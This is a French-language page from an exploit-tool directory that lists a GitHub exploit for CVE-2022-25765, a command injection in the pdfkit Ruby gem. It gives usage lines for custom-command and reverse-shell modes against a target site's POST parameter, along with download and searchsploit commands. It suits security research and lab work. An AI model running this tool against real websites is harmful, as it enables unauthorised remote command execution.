Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit-CVE-2022-25765 — Exploit pour CVE-2022–25765 (pdfkit) - Injection de commandes | Kitploit
Outils/GitHubGitHub/unicordev/exploit-cve-2022-25765
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubunicordev/exploit-cve-2022-25765

exploit-CVE-2022-25765

Exploit pour CVE-2022–25765 (pdfkit) - Injection de commandes

Voir le dépôt
314il y a 11 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Exploit pour CVE-2022-25765 (pdfkit) - Injection de commandes

GitHub CVE Cover

Vous aimez ce dépôt ? Donnez-nous une ⭐ !

À des fins éducatives et de recherche en sécurité autorisée uniquement.

Auteur de l'exploit

@UNICORDev par (@NicPWNs et @Dev-Yeoj)

Description de la vulnérabilité

Le package pdfkit à partir de la version 0.0.0 est vulnérable à l'injection de commandes car l'URL n'est pas correctement nettoyée.

Description de l'exploit

Une gemme Ruby pdfkit est couramment utilisée pour convertir des sites web ou du HTML en documents PDF. Les versions vulnérables (< 0.8.7.2) de ce logiciel peuvent recevoir une URL spécialement conçue contenant une commande qui sera exécutée. Cet exploit génère des URL exécutables ou les envoie à un site web vulnérable utilisant pdfkit.

Utilisation

root@kitploit:~
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

Options

root@kitploit:~
  -c    Mode commande personnalisée. Fournissez la commande pour générer une charge utile personnalisée.
  -s    Mode shell inversé. Fournissez l'IP locale et le port pour générer une charge utile de shell inversé.
  -w    URL du site web utilisant pdfkit vulnérable. (Optionnel)
  -p    Paramètre POST sur le site web utilisant pdfkit vulnérable. (Optionnel)
  -h    Affiche ce menu d'aide.

Téléchargement

Télécharger exploit-CVE-2022-25765.py depuis GitHub

Télécharger exploit-CVE-2022-25765.py depuis ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 51293

Prérequis de l'exploit

  • python3
  • python3:requests
  • python3:urllib3

Démonstration

Mode commande personnalisée

cropped command

Mode shell inversé envoyé au site web cible

exploit-CVE-2022–25765

Testé sur

pdfkit version 0.8.6

S'applique à

pdfkit versions < 0.8.7.2

Environnement de test

root@kitploit:~
gem install pdfkit -v 0.8.6

Crédits

  • https://nvd.nist.gov/vuln/detail/CVE-2022-25765
  • https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
  • https://app.hackthebox.com/machines/Precious
  • https://www.exploit-db.com/exploits/51293
Télécharger l’outil